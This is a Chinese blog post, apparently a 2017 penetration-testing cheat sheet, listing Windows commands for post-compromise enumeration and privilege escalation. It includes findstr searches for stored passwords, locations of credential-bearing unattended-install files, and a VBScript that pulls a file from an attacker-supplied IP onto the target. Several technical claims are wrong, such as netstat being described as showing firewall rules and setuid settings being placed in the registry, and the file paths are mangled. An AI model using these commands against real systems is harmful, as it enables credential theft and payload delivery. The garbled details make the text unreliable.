Windows内网渗透提权的几个实用命令

  • 2017-03-07
  • 0

Windows内网渗透提权的几个实用命令

1.获取操作系统信息

查看所有环境变量:set

识别系统体系结构:echo %PROCESSOR_ARCHITECTURE%  AMD64

识别操作系统名称及版本:systeminfo

查看某特定用户信息:net user

 

2.获取网络信息

查看路由表信息:route print

查看ARP缓存信息:arp -A

查看防火墙规则:netstat -ano

 

3.应用程序及服务信息

查看计划任务:schtasks /QUERY

查看服务进程ID:tasklist

查看安装驱动:DRIVERQUERY

查看安装程序和版本信息(漏洞利用线索):wmic product list brief

查看服务、进程和启动程序信息:wmic service list brief     wmic process list brief     wmic startup list brief   

查看.msi程序的执行权限:reg query HKCU   reg query HKLM

查看是否设置有setuid和setgid:reg query HKEY_Local_Machine

查看安装补丁和时间信息:wmic qfe get Caption,Description,HotFixID,InstalledOn

查看特定漏洞补丁信息:wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KBxxxxxxx”

 

4.敏感数据和目录

查找密码文件或其它敏感文件:findstr /si login *.xml *.ini *.txt     findstr /si password *.xml *.ini *.txt

这些文件通常包含base64模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:

C:sysprep.inf C:sysprepsysprep.xml C:WindowsPantherUnattendUnattended.xml C:WindowsPantherUnattended.xml

 

5.一个有用的文件上传脚本

复制代码
 downloadfile.vbs   Set your settings  strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}" strHDLocation = "c:\{FILE_NAME.EXT}"  Fetch the file Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type = 1 adTypeBinary  objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0 Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation

objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing
复制代码

脚本下载地址:http://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line/59489#59489

该脚本是一个社区发布的,你可以以下这种方式运行它:C:Users hel3l>cscript.exe downloadfile.vbs